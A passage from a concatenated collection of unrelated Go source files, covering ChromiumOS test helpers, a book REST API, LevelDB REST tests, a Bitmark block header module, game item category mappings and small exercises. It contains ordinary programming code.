continue
}
// Wait for the process to exit for sure.
// This may take as long as 10 seconds due to busy init process.
if err := testing.Poll(ctx, func(ctx context.Context) error {
// We need a fresh process.Process since it caches attributes.
if _, err := process.NewProcess(p.Pid); err == nil {
return errors.Errorf("pid %d is still running", p.Pid)
}
return nil
}, nil); err != nil {
return errors.Wrap(err, "failed on waiting for ADB local server process to exit")
}
}
return nil
}
const apkPathPrefix = "/usr/local/libexec/tast/apks/local/cros"
// APKPath returns the absolute path to a helper APK.
func APKPath(value string) string {
return filepath.Join(apkPathPrefix, value)
}
|
// description : IntSet library tester
// author : Tom Geudens (https://github.com/tomgeudens/)
// modified : 2016/07/15
//
package main
import (
"fmt"
"github.com/tomgeudens/the_go_programming_language/intset"
)
var x intset.IntSet
var y intset.IntSet
var z intset.IntSet
func main() {
fmt.Printf("length x : %d\n", (&x).Len())
(&x).Add(1)
(&x).Add(144)
(&x).Add(9)
fmt.Printf("length x : %d\n", (&x).Len())
fmt.Println("x = " + (&x).String())
fmt.Printf("length y : %d\n", (&y).Len())
(&y).Add(9)
(&y).Add(42)
fmt.Printf("length y : %d\n", (&y).Len())
fmt.Println("y = " + (&y).String())
(&x).UnionWith(&y)
fmt.Printf("length x : %d\n", (&x).Len())
fmt.Printf("length y : %d\n", (&y).Len())
fmt.Println("x = " + (&x).String())
fmt.Println((&x).Has(9), (&x).Has(123))
(&x).Remove(42)
fmt.Printf("length x : %d\n", (&x).Len())
fmt.Println("x = " + (&x).String())
z = *((&y).Copy())
(&y).Clear()
fmt.Printf("length y : %d\n", (&y).Len())
fmt.Println("y = " + (&y).String())
fmt.Printf("length z : %d\n", (&z).Len())
fmt.Println("z = " + (&z).String())
(&y).AddAll(1, 2, 3)
fmt.Printf("length y : %d\n", (&y).Len())
fmt.Println("y = " + (&y).String())
(&z).Add(255)
fmt.Printf("length z : %d\n", (&z).Len())
fmt.Println("z = " + (&z).String())
(&z).IntersectWith(&x)
fmt.Printf("length z : %d\n", (&z).Len())
fmt.Println("z = " + (&z).String())
(&x).DifferenceWith(&z)
fmt.Printf("length x : %d\n", (&x).Len())
fmt.Println("x = " + (&x).String())
(&x).SymmetricDifferenceWith(&y)
fmt.Printf("length x : %d\n", (&x).Len())
fmt.Println("x = " + (&x).String())
fmt.Println((&x).Elems())
fmt.Println((&y).Elems())
fmt.Println((&z).Elems())
}
|
// gRPC service
package main
import (
"net"
"os"
"github.com/romana/rlog"
"github.com/youngderekm/grpc-cookies-example/servicedef"
"google.golang.org/grpc"
"google.golang.org/grpc/reflection"
)
// service is the struct that our gRPC service methods will be bound to
type server struct {
}
func main() {
// log at debug for this demo
os.Setenv("RLOG_LOG_LEVEL", "DEBUG")
rlog.UpdateEnv()
// Create the grpc server
grpcServer := grpc.NewServer()
authServer := server{}
// Register our service
servicedef.RegisterAuthApiServer(grpcServer, &authServer)
// Set up the listener
hostAndPort := "localhost:50051"
lis, err := net.Listen("tcp", hostAndPort)
if err != nil {
rlog.Criticalf("API server failed on net.Listen: %v", err)
os.Exit(1)
}
rlog.Infof("Listening for gRPC requests at %s", hostAndPort)
reflection.Register(grpcServer) // Register reflection service on gRPC api.
if err := grpcServer.Serve(lis); err != nil {
rlog.Criticalf("API server failed on grpc Serve: %v", err)
os.Exit(1)
}
}
|
package kids
import (
"reflect"
"testing"
)
var examples = []struct {
want []bool
candies []int
extraCandies int
}{
{
want: []bool{true, true, true, false, true},
candies: []int{2, 3, 5, 1, 3},
extraCandies: 3,
},
{
want: []bool{true, false, false, false, false},
candies: []int{4, 2, 1, 1, 2},
extraCandies: 1,
},
{
want: []bool{true, false, true},
candies: []int{12, 1, 12},
extraCandies: 10,
},
}
func Test_kidsWithCandies_examples(t *testing.T) {
for i, e := range examples {
got := kidsWithCandies(e.candies, e.extraCandies)
if !reflect.DeepEqual(e.want, got) {
t.Fatalf(
"\ni:%v candies:%v extraCandies:%v want:%v got:%v",
i, e.candies, e.extraCandies, e.want, got,
)
}
}
}
|
package main
import (
"encoding/json"
"errors"
"fmt"
"log"
"net/http"
"sort"
"github.com/gorilla/mux"
)
type book struct {
Isbn string `json:"isbn"`
Title string `json:"title"`
Author string `json:"author"`
}
// database facade
var db map[string]book
// ---------------------------------------------------------
// GET /
// ---------------------------------------------------------
func indexPage(w http.ResponseWriter, r *http.Request) {
fmt.Fprintf(w, "Welcome...")
}
type byTitle []book
func (m byTitle) Len() int { return len(m) }
func (m byTitle) Less(i, j int) bool { return m[i].Title < m[j].Title }
func (m byTitle) Swap(i, j int) { m[i], m[j] = m[j], m[i] }
// --------------------------------------------------------
// GET /books : return all books
// --------------------------------------------------------
func getBooks(w http.ResponseWriter, r *http.Request) {
s := []book{}
for _, value := range db {
s = append(s, value)
}
sort.Sort(byTitle(s))
var out []byte
out, err := json.Marshal(s)
if err != nil {
fmt.Println("error")
}
returnJSONResponse(w, out)
}
func returnJSONResponse(w http.ResponseWriter, out []byte) {
w.WriteHeader(http.StatusOK)
w.Header().Set("Content-Type", "application/json")
fmt.Fprintf(w, string(out))
}
// -----------------------------------------------------------------
// GET /books/{id}
// -----------------------------------------------------------------
func getBook(w http.ResponseWriter, r *http.Request) {
vars := mux.Vars(r)
mybook, ok := db[vars["id"]]
if !ok {
w.WriteHeader(http.StatusNotFound)
return
}
// converrt to json
var out []byte
out, err := json.Marshal(mybook)
if err != nil {
fmt.Println("error")
}
returnJSONResponse(w, out)
}
// -----------------------------------------------------
// DELETE /books/{id}
// -----------------------------------------------------
func deleteBook(w http.ResponseWriter, r *http.Request) {
vars := mux.Vars(r)
mybook, ok := db[vars["id"]]
if !ok {
w.WriteHeader(http.StatusNotFound)
return
}
delete(db, mybook.Isbn)
w.WriteHeader(http.StatusOK)
}
// -------------------------------------------------------
// POST /books : add a book
// -------------------------------------------------------
func addBook(w http.ResponseWriter, r *http.Request) {
var mybook book
// convert posted json to struct
decoder := json.NewDecoder(r.Body)
if err := decoder.Decode(&mybook); err != nil {
w.WriteHeader(http.StatusBadRequest)
return
}
defer r.Body.Close()
// check input
err := verify(&mybook)
if err != nil {
fmt.Fprintf(w, err.Error())
w.WriteHeader(http.StatusBadRequest)
return
}
// add to database
db[mybook.Isbn] = mybook
// convert back to json
var out []byte
out, err2 := json.Marshal(mybook)
if err2 != nil {
w.WriteHeader(http.StatusInternalServerError)
return
}
w.WriteHeader(http.StatusCreated)
w.Header().Set("Content-Type", "application/json")
fmt.Fprintf(w, string(out))
}
func verify(mybook *book) error {
if mybook.Isbn == "" {
return errors.New("Missing Isbn")
}
_, ok := db[mybook.Isbn]
if ok {
return errors.New("Duplicate Isbn")
}
return nil
}
// ----------------------------------------------------
// PUT /books : upate a book
// ---------------------------------------------------
func updateBook(w http.ResponseWriter, r *http.Request) {
var mybook book
// convert posted json to struct
decoder := json.NewDecoder(r.Body)
if err := decoder.Decode(&mybook); err != nil {
w.WriteHeader(http.StatusBadRequest)
return
}
defer r.Body.Close()
_, ok := db[mybook.Isbn]
if !ok {
// return response indicating invalid book
w.WriteHeader(http.StatusBadRequest)
return
}
db[mybook.Isbn] = mybook
w.WriteHeader(http.StatusOK)
}
func runServer() {
r := mux.NewRouter()
r.HandleFunc("/", indexPage)
r.HandleFunc("/books", getBooks).Methods("GET")
r.HandleFunc("/books/{id}", getBook).Methods("GET")
r.HandleFunc("/books/{id}", deleteBook).Methods("DELETE")
r.HandleFunc("/books", addBook).Methods("POST")
r.HandleFunc("/books", updateBook).Methods("PUT")
http.Handle("/", r)
log.Fatal(http.ListenAndServe(":8080", r))
}
func main() {
db = make(map[string]book)
db["1"] = book{Isbn: "1", Title: "Star Wars", Author: "George Lucas"}
db["2"] = book{Isbn: "2", Title: "The Empire Strikes Back", Author: "George Lucas"}
db["3"] = book{Isbn: "3", Title: "Return Of The Jedi", Author: "George Lucas"}
runServer()
}
|
package main
import "fmt"
//Code does not work
//It does not work because the channel needs to be able to
//load and unload at the same time
//If this cannot happen then the channel gets locked
func main() {
c := make(chan int)
c <- 42
fmt.Println(<-c)
}
|
// SPDX-License-Identifier: ISC
// Copyright (c) 2014-2020 Bitmark Inc.
// Use of this source code is governed by an ISC
// license that can be found in the LICENSE file.
package blockheader
import (
"sync"
"github.com/bitmark-inc/bitmarkd/blockdigest"
"github.com/bitmark-inc/bitmarkd/fault"
"github.com/bitmark-inc/bitmarkd/genesis"
"github.com/bitmark-inc/bitmarkd/mode"
"github.com/bitmark-inc/logger"
)
// globals for header
type blockData struct {
sync.RWMutex // to allow locking
log *logger.L
height uint64 // this is the current block Height
previousBlock blockdigest.Digest // and its digest
previousVersion uint16 // plus its version
previousTimestamp uint64 // plus its timestamp
// set once during initialise
initialised bool
}
// global data
var globalData blockData
// Initialise - setup the current block data
func Initialise() error {
globalData.Lock()
defer globalData.Unlock()
// no need to start if already started
if globalData.initialised {
return fault.AlreadyInitialised
}
log := logger.New("blockheader")
globalData.log = log
log.Info("starting…")
setGenesis()
log.Infof("block height: %d", globalData.height)
log.Infof("previous block: %v", globalData.previousBlock)
log.Infof("previous version: %d", globalData.previousVersion)
// all data initialised
globalData.initialised = true
return nil
}
// Finalise - shutdown the block header system
func Finalise() error {
if !globalData.initialised {
return fault.NotInitialised
}
globalData.log.Info("shutting down…")
globalData.log.Flush()
// finally...
globalData.initialised = false
globalData.log.Info("finished")
globalData.log.Flush()
return nil
}
// SetGenesis - reset the block data
func SetGenesis() {
globalData.Lock()
setGenesis()
globalData.Unlock()
}
// internal: must hold lock
func setGenesis() {
globalData.height = genesis.BlockNumber
globalData.previousBlock = genesis.LiveGenesisDigest
globalData.previousVersion = 1
globalData.previousTimestamp = 0
if mode.IsTesting() {
globalData.previousBlock = genesis.TestGenesisDigest
}
}
// Set - set current header data
func Set(height uint64, digest blockdigest.Digest, version uint16, timestamp uint64) {
globalData.Lock()
globalData.height = height
globalData.previousBlock = digest
globalData.previousVersion = version
globalData.previousTimestamp = timestamp
globalData.Unlock()
}
// Get - return all header data
func Get() (uint64, blockdigest.Digest, uint16, uint64) {
globalData.RLock()
defer globalData.RUnlock()
return globalData.height, globalData.previousBlock, globalData.previousVersion, globalData.previousTimestamp
}
// GetNew - return block data for initialising a new block
// returns: previous block digest and the number for the new block
func GetNew() (blockdigest.Digest, uint64) {
globalData.RLock()
defer globalData.RUnlock()
nextBlockNumber := globalData.height + 1
return globalData.previousBlock, nextBlockNumber
}
// Height - return current height
func Height() uint64 {
globalData.RLock()
defer globalData.RUnlock()
return globalData.height
}
|
package item
import (
"errors"
)
var (
ErrInvalidCategory = errors.New("category is not valid")
)
const (
CategoryAmmunition = "ammunition"
CategoryArmor = "armor"
CategoryBackpack = "backpack"
CategoryBarter = "barter"
CategoryClothing = "clothing"
CategoryCommon = "common"
CategoryContainer = "container"
CategoryFirearm = "firearm"
CategoryFood = "food"
CategoryGrenade = "grenade"
CategoryHeadphone = "headphone"
CategoryKey = "key"
CategoryMagazine = "magazine"
CategoryMap = "map"
CategoryMedical = "medical"
CategoryMelee = "melee"
CategoryModification = "mod-other"
CategoryModificationBarrel = "barrel"
CategoryModificationBipod = "bipod"
CategoryModificationCharge = "charge"
CategoryModificationDevice = "device"
CategoryModificationForegrip = "foregrip"
CategoryModificationGasblock = "gasblock"
CategoryModificationGoggles = "goggles"
CategoryModificationHandguard = "handguard"
CategoryModificationLauncher = "launcher"
CategoryModificationMount = "mount"
CategoryModificationMuzzle = "muzzle"
CategoryModificationPistolgrip = "pistolgrip"
CategoryModificationReceiver = "receiver"
CategoryModificationSight = "sight"
CategoryModificationSightSpecial = "sight-special"
CategoryModificationStock = "stock"
CategoryMoney = "money"
CategoryTacticalrig = "tacticalrig"
)
func CategoryToKind(s string) (Kind, error) {
var k Kind
switch s {
case CategoryAmmunition:
k = KindAmmunition
case CategoryArmor:
k = KindArmor
case CategoryBackpack:
k = KindBackpack
case CategoryBarter:
k = KindBarter
case CategoryClothing:
k = KindClothing
case CategoryCommon:
k = KindCommon
case CategoryContainer:
k = KindContainer
case CategoryFirearm:
k = KindFirearm
case CategoryFood:
k = KindFood
case CategoryGrenade:
k = KindGrenade
case CategoryHeadphone:
k = KindHeadphone
case CategoryKey:
k = KindKey
case CategoryMagazine:
k = KindMagazine
case CategoryMap:
k = KindMap
case CategoryMedical:
k = KindMedical
case CategoryMelee:
k = KindMelee
case CategoryModification:
k = KindModification
case CategoryModificationBarrel:
k = KindModificationBarrel
case CategoryModificationBipod:
k = KindModificationBipod
case CategoryModificationCharge:
k = KindModificationCharge
case CategoryModificationDevice:
k = KindModificationDevice
case CategoryModificationForegrip:
k = KindModificationForegrip
case CategoryModificationGasblock:
k = KindModificationGasblock
case CategoryModificationGoggles:
k = KindModificationGoggles
case CategoryModificationHandguard:
k = KindModificationHandguard
case CategoryModificationLauncher:
k = KindModificationLauncher
case CategoryModificationMount:
k = KindModificationMount
case CategoryModificationMuzzle:
k = KindModificationMuzzle
case CategoryModificationPistolgrip:
k = KindModificationPistolgrip
case CategoryModificationReceiver:
k = KindModificationReceiver
case CategoryModificationSight:
k = KindModificationSight
case CategoryModificationSightSpecial:
k = KindModificationSightSpecial
case CategoryModificationStock:
k = KindModificationStock
case CategoryMoney:
k = KindMoney
case CategoryTacticalrig:
k = KindTacticalrig
default:
return k, ErrInvalidCategory
}
return k, nil
}
func KindToCategory(k Kind) (string, error) {
var c string
switch k {
case KindAmmunition:
c = CategoryAmmunition
case KindArmor:
c = CategoryArmor
case KindBackpack:
c = CategoryBackpack
case KindBarter:
c = CategoryBarter
case KindClothing:
c = CategoryClothing
case KindCommon:
c = CategoryCommon
case KindContainer:
c = CategoryContainer
case KindFirearm:
c = CategoryFirearm
case KindFood:
c = CategoryFood
case KindGrenade:
c = CategoryGrenade
case KindHeadphone:
c = CategoryHeadphone
case KindKey:
c = CategoryKey
case KindMagazine:
c = CategoryMagazine
case KindMap:
c = CategoryMap
case KindMedical:
c = CategoryMedical
case KindMelee:
c = CategoryMelee
case KindModification:
c = CategoryModification
case KindModificationBarrel:
c = CategoryModificationBarrel
case KindModificationBipod:
c = CategoryModificationBipod
case KindModificationCharge:
c = CategoryModificationCharge
case KindModificationDevice:
c = CategoryModificationDevice
case KindModificationForegrip:
c = CategoryModificationForegrip
case KindModificationGasblock:
c = CategoryModificationGasblock
case KindModificationGoggles:
c = CategoryModificationGoggles
case KindModificationHandguard:
c = CategoryModificationHandguard
case KindModificationLauncher:
c = CategoryModificationLauncher
case KindModificationMount:
c = CategoryModificationMount
case KindModificationMuzzle:
c = CategoryModificationMuzzle
case KindModificationPistolgrip:
c = CategoryModificationPistolgrip
case KindModificationReceiver:
c = CategoryModificationReceiver
case KindModificationSight:
c = CategoryModificationSight
case KindModificationSightSpecial:
c = CategoryModificationSightSpecial
case KindModificationStock:
c = CategoryModificationStock
case KindMoney:
c = CategoryMoney
case KindTacticalrig:
c = CategoryTacticalrig
default:
return c, ErrInvalidKind
}
return c, nil
}
func CategoryToDisplayName(s string) (string, error) {
var c string
switch s {
case CategoryAmmunition:
c = "ammunition"
case CategoryArmor:
c = "armor"
case CategoryBackpack:
c = "backpack"
case CategoryBarter:
c = "barter"
case CategoryClothing:
c = "clothing"
case CategoryCommon:
c = "common"
case CategoryContainer:
c = "container"
case CategoryFirearm:
c = "firearm"
case CategoryFood:
c = "food"
case CategoryGrenade:
c = "grenade"
case CategoryHeadphone:
c = "headphone"
case CategoryKey:
c = "key"
case CategoryMagazine:
c = "magazine"
case CategoryMap:
c = "map"
case CategoryMedical:
c = "medical"
case CategoryMelee:
c = "melee"
case CategoryModification:
c = "modification other"
case CategoryModificationBarrel:
c = "barrel"
case CategoryModificationBipod:
c = "bipod"
case CategoryModificationCharge:
c = "charging handle"
case CategoryModificationDevice:
c = "device"
case CategoryModificationForegrip:
c = "foregrip"
case CategoryModificationGasblock:
c = "gas block"
case CategoryModificationGoggles:
c = "goggles"
case CategoryModificationHandguard:
c = "handguard"
case CategoryModificationLauncher:
c = "launcher"
case CategoryModificationMount:
c = "mount"
case CategoryModificationMuzzle:
c = "muzzle"
case CategoryModificationPistolgrip:
c = "pistol grip"
case CategoryModificationReceiver:
c = "receiver"
case CategoryModificationSight:
c = "sight"
case CategoryModificationSightSpecial:
c = "special sight"
case CategoryModificationStock:
c = "stock"
case CategoryMoney:
c = "money"
case CategoryTacticalrig:
c = "tactical rig"
default:
return c, ErrInvalidCategory
}
return c, nil
}
|
package libldbrest
import (
"fmt"
"io"
"io/ioutil"
"net/http"
"net/http/httptest"
"os"
"strings"
"testing"
"github.com/syndtr/goleveldb/leveldb"
"github.com/syndtr/goleveldb/leveldb/opt"
"github.com/ugorji/go/codec"
)
func TestMultiGet(t *testing.T) {
dbpath := setup(t)
defer cleanup(dbpath)
k1 := "1"
k2 := "2"
app := newAppTester(t)
app.put(k1, k1)
app.put(k2, k2)
expectNItems := 2
itemMap := app.multiGet([]string{k1, k2})
if len(itemMap) != expectNItems {
t.Fatalf("Expected len(itemMap) to be %d, got %d\n", expectNItems, len(itemMap))
}
if itemMap[k1] != k1 {
t.Fatalf("Expected itemMap[%s] to be '%s', got '%s'\n", k1, k1, itemMap[k1])
}
if itemMap[k2] != k2 {
t.Fatalf("Expected itemMap[%s] to be '%s', got '%s'\n", k2, k2, itemMap[k2])
}
}
func TestMultiGetMissingKey(t *testing.T) {
dbpath := setup(t)
defer cleanup(dbpath)
k1 := "1"
k2 := "2"
kMissing := "3"
app := newAppTester(t)
app.put(k1, k1)
app.put(k2, k2)
expectNItems := 2
itemMap := app.multiGet([]string{k1, k2, kMissing})
if len(itemMap) != expectNItems {
t.Fatalf("Expected len(itemMap) to be %d, got %d\n", expectNItems, len(itemMap))
}
if itemMap[k1] != k1 {
t.Fatalf("Expected itemMap[%s] to be '%s', got '%s'\n", k1, k1, itemMap[k1])
}
if itemMap[k2] != k2 {
t.Fatalf("Expected itemMap[%s] to be '%s', got '%s'\n", k2, k2, itemMap[k2])
}
if val, ok := itemMap[kMissing]; ok {
t.Fatalf("Expected itemMap[%s] to not exist, got '%s'\n", kMissing, val)
}
}
func TestKeyPutGet(t *testing.T) {
dbpath := setup(t)
defer cleanup(dbpath)
app := newAppTester(t)
app.put("foo", "bar")
val := app.get("foo")
if val != "bar" {
t.Fatalf("wrong 'foo' value: %s", val)
}
found, _ := app.maybeGet("baz")
if found {
t.Fatal("found 'baz' when we shouldn't have")
}
}
func TestDelete(t *testing.T) {
dbpath := setup(t)
defer cleanup(dbpath)
app := newAppTester(t)
app.put("a", "A")
if !app.del("a") {
t.Fatal("failed to DELETE existing key")
}
if !app.del("b") {
t.Fatal("failed to DELETE non-existing key")
}
found, _ := app.maybeGet("a")
if found {
t.Fatal("DELETE didn't remove a key")
}
}
func TestIteration(t *testing.T) {
dbpath := setup(t)
defer cleanup(dbpath)
app := newAppTester(t)
app.put("a", "A")
app.put("b", "B")
app.put("c", "C")
app.put("d", "D")
/*
[b, d)
*/
rr := app.doReq("GET", "http://domain/iterate?start=b&include_start=yes&end=d", "")
if rr.Code != 200 {
t.Fatalf("bad GET /iterate response: %d", rr.Code)
}
kresp := &multiResponse{}
if err := codec.NewDecoder(rr.Body, msgpack).Decode(kresp); err != nil {
t.Fatal(err)
}
assert(t, len(kresp.Data) == 2, "wrong # of returned keys: %d", len(kresp.Data))
assert(t, kresp.Data[0].Key == "b", "wrong returned key: %s", kresp.Data[0])
assert(t, kresp.Data[1].Key == "c", "wrong returned key: %s", kresp.Data[1])
assert(t, !*kresp.More, "ldbrest falsely reporting 'more'")
/*
keys and vals [0, 2)
*/
rr = app.doReq("GET", "http://domain/iterate?max=2", "")
if rr.Code != 200 {
t.Fatalf("bad GET /iterate response: %d", rr.Code)
}
kvresp := &multiResponse{}
if err := codec.NewDecoder(rr.Body, msgpack).Decode(kvresp); err != nil {
t.Fatal(err)
}
assert(t, len(kvresp.Data) == 2, "wrong # of keyvals: %d", len(kvresp.Data))
assert(t, kvresp.Data[0].Key == "a", "wrong first key: %s", kvresp.Data[0].Key)
assert(t, kvresp.Data[0].Value == "A", "wrong first value: %s", kvresp.Data[0].Value)
assert(t, kvresp.Data[1].Key == "b", "wrong second key: %s", kvresp.Data[1].Key)
assert(t, kvresp.Data[1].Value == "B", "wrong second value: %s", kvresp.Data[1].Value)
assert(t, !*kvresp.More, "ldbrest falsely reporting 'more'")
/*
keys and vals [a, d] with max 3 (trigger 'more')
*/
rr = app.doReq("GET", "http://domain/iterate?start=a&end=d&include_end=yes&max=3", "")
if rr.Code != 200 {
t.Fatalf("bad GET /iterate response: %d", rr.Code)
}
*kvresp.More = false
kvresp.Data = nil
if err := codec.NewDecoder(rr.Body, msgpack).Decode(kvresp); err != nil {
t.Fatal(err)
}
assert(t, len(kvresp.Data) == 3, "wrong # of keyvals: %d", len(kvresp.Data))
assert(t, *kvresp.More, "'more' should be true")
assert(t, kvresp.Data[0].Key == "a", "wrong data[0].Key: %s", kvresp.Data[0].Key)
assert(t, kvresp.Data[1].Key == "b", "wrong data[1].Key: %s", kvresp.Data[1].Key)
assert(t, kvresp.Data[2].Key == "c", "wrong data[2].Key: %s", kvresp.Data[2].Key)
assert(t, kvresp.Data[0].Value == "A", "wrong data[0].Value: %s", kvresp.Data[0].Value)
assert(t, kvresp.Data[1].Value == "B", "wrong data[1].Value: %s", kvresp.Data[1].Value)
assert(t, kvresp.Data[2].Value == "C", "wrong data[2].Value: %s", kvresp.Data[2].Value)
/*
keys only [d, a] in reverse with max 2 (trigger 'more')
*/
rr = app.doReq("GET", "http://domain/iterate?start=d&forward=no&max=2&end=a&include_end=yes", "")
if rr.Code != 200 {
t.Fatalf("bad GET /iterate response: %d", rr.Code)
}
kresp.More = nil
kresp.Data = nil
if err := codec.NewDecoder(rr.Body, msgpack).Decode(kresp); err != nil {
t.Fatal(err)
}
assert(t, len(kresp.Data) == 2, "wrong # of keys: %d", len(kresp.Data))
assert(t, *kresp.More, "'more' should be true (reverse)")
assert(t, kresp.Data[0].Key == "d", "wrong data[0]: %s", kresp.Data[0])
assert(t, kresp.Data[1].Key == "c", "wrong data[1]: %s", kresp.Data[1])
}
func TestBatch(t *testing.T) {
dbpath := setup(t)
defer cleanup(dbpath)
app := newAppTester(t)
app.put("foo", "bar")
if !app.batch(oplist{
{"put", "a", "A"},
{"put", "b", "B"},
{"delete", "foo", ""},
}) {
t.Fatal("batch call failed")
}
if app.get("a") != "A" || app.get("b") != "B" {
t.Fatal("puts in the batch didn't go through")
}
if found, _ := app.maybeGet("foo"); found {
t.Fatal("delete in the batch didn't go through")
}
}
func setup(tb testing.TB) string {
dirpath, err := ioutil.TempDir("", "ldbrest_test")
if err != nil {
tb.Fatal(err)
}
db, err = leveldb.OpenFile(dirpath, &opt.Options{
ErrorIfExist: true,
})
if err != nil {
os.RemoveAll(dirpath)
tb.Fatal(err)
}
return dirpath
}
func cleanup(path string) {
if db != nil {
db.Close()
}
os.RemoveAll(path)
}
func assert(tb testing.TB, cond bool, msg string, args ...interface{}) {
if !cond {
tb.Fatalf(msg, args...)
}
}
type appTester struct {
app http.Handler
tb testing.TB
}
func newAppTester(tb testing.TB) *appTester {
return &appTester{app: InitRouter(""), tb: tb}
}
func (app *appTester) doReq(method, url, body string) *httptest.ResponseRecorder {
var bodyReader io.Reader
if body == "" {
bodyReader = nil
} else {
bodyReader = strings.NewReader(body)
}
req, err := http.NewRequest(method, url, bodyReader)
if err != nil {
app.tb.Fatal(err)
}
rr := httptest.NewRecorder()
app.app.ServeHTTP(rr, req)
rr.Flush()
return rr
}
func (app *appTester) put(key, value string) {
b := make([]byte, 0)
err := codec.NewEncoderBytes(&b, msgpack).Encode(keyval{key, value})
if err != nil {
app.tb.Fatalf("failed msgpack encode")
}
rr := app.doReq("POST", "http://domain/key", string(b))
if rr.Code != 204 {
app.tb.Fatalf("non-204 PUT /key/X response: %d", rr.Code)
}
}
func (app *appTester) maybeGet(key string) (bool, string) {
rr := app.doReq("GET", fmt.Sprintf("http://domain/key/%s", key), "")
switch rr.Code {
case http.StatusNotFound:
return false, ""
case http.StatusOK:
ct := rr.HeaderMap.Get("Content-Type")
if ct != msgpackCType {
app.tb.Fatalf("non 'application/msgpack' 200 GET /key/%s response: %s", key, ct)
}
default:
app.tb.Fatalf("questionable GET /key/%s response: %d", key, rr.Code)
}
req := &keyval{}
err := codec.NewDecoder(rr.Body, msgpack).Decode(req)
if err != nil {
app.tb.Fatalf("bad msgpack GET /key/%s", key)
}
return true, req.Value
}
func (app *appTester) get(key string) string {
found, value := app.maybeGet(key)
if !found {
app.tb.Fatalf("failed to find key %s", key)
}
return value
}
func (app *appTester) multiGet(keys []string) map[string]string {
reqBody := map[string][]string{
"keys": keys,
}
bytesOut := make([]byte, 0)
err := codec.NewEncoderBytes(&bytesOut, msgpack).Encode(reqBody)
if err != nil {
app.tb.Fatalf("Error: msgpack marshal: %s\n request body was: %#v\n", err.Error(), reqBody)
}
rr := app.doReq("POST", "http://domain/keys", string(bytesOut))
if rr.Code == http.StatusOK {
ct := rr.HeaderMap.Get("Content-Type")
if ct != "application/msgpack" {
app.tb.Fatalf("non 'application/msgpack' 200 POST /keys response: %s\n keys: %v\n", ct, keys)
}
} else {
app.tb.Fatalf("questionable GET /keys, keys: %v, response: %d", keys, rr.Code)
}
items := &multiResponse{}
err = codec.NewDecoderBytes(rr.Body.Bytes(), msgpack).Decode(items)
if err != nil {
app.tb.Fatalf("Error: msgpack unmarshal: %s\n keys: %v\n response body: %s", err.Error(), keys, rr.Body.String())
}
results := map[string]string{}
for _, kv := range items.Data {
results[kv.Key] = kv.Value
}
return results
}
func (app *appTester) del(key string) bool {
rr := app.doReq("DELETE", fmt.Sprintf("http://domain/key/%s", key), "")
return rr.Code == 204
}
func (app *appTester) batch(ops oplist) bool {
bytesOut := make([]byte, 0)
err := codec.NewEncoderBytes(&bytesOut, msgpack).Encode(struct {
Ops oplist `codec:"ops"`
}{ops})
if err != nil {
app.tb.Fatalf("json ops Marshal: %v", err)
}
rr := app.doReq("POST", "http://domain/batch", string(bytesOut))
return rr.Code == 204
}
|
/*
Copyright (c) 2014
Dario Brandes
Thies Johannsen
Paul Kröger
Sergej Mann
Roman Naumann
Sebastian Thobe
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
/* -*- Mode: Go; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
package uictrl
import (
"strconv"
"../../core/db"
"github.com/ant0ine/go-json-rest/rest"
)
type Api struct {
db.SSNDB
}
type Idable interface {
Id() int64
}
func (api *Api) InitDB() {
api.Init()
// for debug purpose
//api.LogMode(true)
}
func appendIfMissing(array []db.Onion, element db.Onion) []db.Onion {
for _, ele := range array {
if ele.Id == element.Id {
return array
}
}
return append(array, element)
}
func ToIds(array []string) (err error, intArray []int64) {
intArray = make([]int64, len(array))
for index, value := range array {
id, err := strconv.ParseInt(value, 10, 64)
if err != nil {
return err, []int64{}
}
intArray[index] = id
}
return nil, intArray
}
func ToId(value string) (err error, id int64) {
id, err = strconv.ParseInt(value, 10, 64)
return
}
func GetRequestedIds(r *rest.Request) (ids []int64, err error) {
idMap := r.URL.Query()
for _, queryId := range idMap["ids[]"] {
id, err := strconv.ParseInt(queryId, 10, 64)
if err != nil {
return ids, err
}
ids = append(ids, int64(id))
}
return
}
|
package html5
const (
admonitionBlockTmpl = `<div {{ if .ID }}id="{{ .ID}}" {{ end }}` +
"class=\"admonitionblock {{ .Kind }}{{ if .Roles }} {{ .Roles }}{{ end }}\">\n" +
"<table>\n" +
"<tr>\n" +
"<td class=\"icon\">\n{{ .Icon }}\n</td>\n" +
"<td class=\"content\">\n" +
"{{ if .Title }}<div class=\"title\">{{ .Title }}</div>\n{{ end }}" +
"{{ .Content }}" +
"</td>\n</tr>\n</table>\n</div>\n"
)
|
package main
import (
"time"
)
type cmdDTOIN struct {
CmdName string `json:"CmdName"`
Arguments string `json:"Arguments"`
}
type cmdDTOOut struct {
CmdName string `json:"CmdName"`
Arguments string `json:"Arguments"`
PID int `json:"PID"`
StartTime time.Time `json:"StartTime"`
}
func generateCmdOut(cmd Command) cmdDTOOut {
var out cmdDTOOut
out.CmdName = cmd.CmdName
out.Arguments = cmd.Arguments
out.PID = cmd.PID
out.StartTime = cmd.StartingTime
return out
}
|
// Copyright 2020 The ChromiumOS Authors
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
package wifi
import (
"context"
"time"
"chromiumos/tast/ctxutil"
"chromiumos/tast/remote/network/iw"
"chromiumos/tast/remote/wificell"
